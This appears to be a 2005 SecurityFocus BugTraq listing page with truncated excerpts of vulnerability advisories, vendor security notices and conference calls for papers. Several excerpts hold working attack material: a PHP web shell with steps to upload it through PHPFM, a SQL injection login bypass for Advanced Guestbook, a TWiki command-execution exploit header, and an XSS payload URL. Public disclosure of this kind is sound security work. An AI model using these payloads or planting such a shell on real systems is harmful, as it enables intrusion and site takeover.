BugTraq Mode:
[EEYEB-20050901] Windows Metafile SetPalette Entries Heap Overflow Vulnerability (Graphics Rendering Engine Vulnerability) 2005-11-08
Advisories eeye com
Windows Metafile SetPalette Entries Heap Overflow Vulnerability
(Graphics Rendering Engine Vulnerability)

Release Date:
November 8, 2005

Date Reported:
September 1, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows XP SP0, SP1
Windows Server 2003 SP0

Re: Hidden accounts on sony vaio laptops 2005-11-08
Williams, James K (James Williams ca com)

Not a Sony issue. This setup has been documented by MS
since the release of Windows XP in 2001.

"Q: How can I add an Administrator password to make my
computer more secure?

A: Another way to make your computer more secure is to
assign a password to the Administrator account, which is
blank b

[SECURITY] [DSA 889-1] New enigmail packages fix information disclosure 2005-11-08
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 889-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 8th, 2005

Advisory 21/2005: Multiple vulnerabilities in PHPKIT 2005-11-08
Christopher Kunz (christopher kunz hardened-php net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: Multiple vulnerabilities in PHPKIT
Release Date: 2005/11/07
Last Modified: 2005/11/04
Auth

Call For Papers 2005-11-08
first-2006papers first org

Call For Papers
18th Annual FIRST Conference
Baltimore, MD

June 25-30, 2006

The Forum of Incident Response and Security Teams (FIRST, http://www.first.org/)
is a global organization dedicated to bringing together computer security incident
response teams (CSIRTs). The annual FIRST conference no

MDKSA-2005:205 - Updated clamav packages fix multiple vulnerabilities 2005-11-08
Mandriva Security Team (security mandriva com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2005:205
http://www.mandriva.com/security/
_____________________________________________________________________

Oracle DBMS_ASSERT and the October 2005 CPU 2005-11-08
NGSSoftware Insight Security Research (nisr nextgenss com)
Whilst there are problems with the Oracle October 2005 Critical Patch
Update, it's not all bad news....

There is a great deal of evidence in this patch that Oracle are beginning to
treat security properly. They've introduced a new package PL/SQL package
DBMS_ASSERT into the RDBMS. Whilst DBMS_AS

Oracle October 2005 CPU Problems 2005-11-08
NGSSoftware Insight Security Research (nisr nextgenss com)
Examining the Oracle October 2005 Critical Patch Update in depth,
NGSResearchers discovered a number of problems which have all since been
reported to Oracle. As well as new vulnerabilities and problems with the
patches for old vulnerabilities, the October 2005 CPU fails to install the
patched O

[TKADV2005-11-001] Multiple vulnerabilities in PHPlist 2005-11-07
tk trapkit de

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: Multiple vulnerabilities in PHPlist
Name: TKADV2005-11-001
Revision: 1.0
Release Date: 2005/11/07
Last Modified: 2005/11/07
Author: Tobias Klein (tk at

LayerOne 2006 CFP Released 2005-11-07
Layer One (layeronecfp gmail com)
LayerOne 2006 - Call for Papers
April 22 & 23, 2006
Los Angeles, California
At the Pasadena Hilton
http://layerone.info

What is LayerOne? Currently in its 3rd year, LayerOne is a computer
security and technology conference held in the Los Angeles area. The
purpose of LayerOne is to bring together the

e107 Games System exploit 2005-11-07
willey_wonka hotmail com
You can insert a highscore into game_score.php using the POST method. The system uses these variables, so a simple form will allow you to add a highscore.
$player_name = $_POST['name'];
$player_score = $_POST['score'];
$game_name = $_POST['game'];

willeh
willey_wonka at hotmail dot com

Re: Re: Mambo Open Source, Path disclosure 2005-11-06
trueend5 yahoo com
You are right.
The mamboserver solution is available now:
The fix is easy,

in /component/com_content/content.php
Approx Line 190 Change the block FROM:

Code:
// Paramters
$params = new stdClass();
if ( $Itemid ) {
$menu = new mosMenu( $database );
$menu->load( $Itemid );
$params =& new mosPa

Advanced Guestbook 2.2 ( SQL Injection Exploit ) 2005-11-06
bhs_team yahoo com
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access.

Target :

http://www.example.com/[GuestbookTarget]/admin.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)

It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix t

Asterisk vmail.cgi vulnerability 2005-11-07
advisories+asterisk assurance com au
Assurance.com.au - Vulnerability Advisory
-----------------------------------------------
Release Date:
07-Nov-2005

Software:
Asterisk Web-VoiceMail (Comedian VoiceMail)
http://www.asterisk.org/

Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and
provides all of the

[USN-214-1] libungif vulnerabilities 2005-11-07
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-214-1 November 07, 2005
libungif4 vulnerabilities
CVE-2005-2974, CVE-2005-3350
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (W

TWiki 20030201 VIEW string remote command execution 2005-11-07
GeekZ[at]WorldDefacers[d0t]NeT
#!/usr/bin/perl
#
# TWiki 20030201 VIEW string remote command execution vulnerability
#
# Exploit coded by runvirus GeekZ[at]WorldDefacers[d0t]NeT
#
#
# [root@localhost perls]$ perl twikiview.pl -h www.victim.com -p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
# -=[ TWiki :- view st

upload phpshell in PHPFM 2005-11-07
GeekZ[at]WorldDefacers[d0t]NeT
upload phpshell in PHPFM

discovered by rUnViRuS

www.worlddefacers.net
www.security-arab.com
=-=-=-=-=-=-=-=-=
the code shell :-
---------------
<pre>
<?
passthru($_GET['cmd']);
?>>

save as > cmd.php
now upload in PHPFM
=-=-=-=
Used Shell
=-=-=-=
www.site.com/[file upload name]/[files]/cmd.php?cmd

[ GLSA 200511-07 ] OpenVPN: Multiple vulnerabilities 2005-11-06
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

XSS vulnerability in names.co.uk framed hosting 2005-11-07
reuben 31 nickname net
names.co.uk is an English registrar and web hosting company.

Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example:

http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20

According to webhosting.info, nam

Re: [Full-disclosure] Re: readdir_r considered harmful 2005-11-07
Andrew Farmer (andfarm gmail com) (1 replies)
On 06 Nov 05, at 01:00, Casper.Dik (at) Sun (dot) COM wrote:
>> Then you never really understood the implementation, seems. Of
>> course
>> all implementations keep the content of the directory as read with
>> getdents or so in the DIR descriptor. But it is usually not the case
>> that the whole content fi

[ GLSA 200511-06 ] fetchmail: Password exposure in fetchmailconf 2005-11-06
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200511-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation 2005-11-07
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 884-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
November 7th, 2005

SEC Consult SA-20051107-0 :: toendaCMS multiple vulnerabilities 2005-11-07
Bernhard Mueller (research sec-consult com)
SEC-CONSULT Security Advisory 20051107-0
=============================================================================
title: toendaCMS multiple vulnerabilities
program: toendaCMS
vulnerable version: <0.6.2
homepage: www.toenda.com

Copyright 2010, SecurityFocus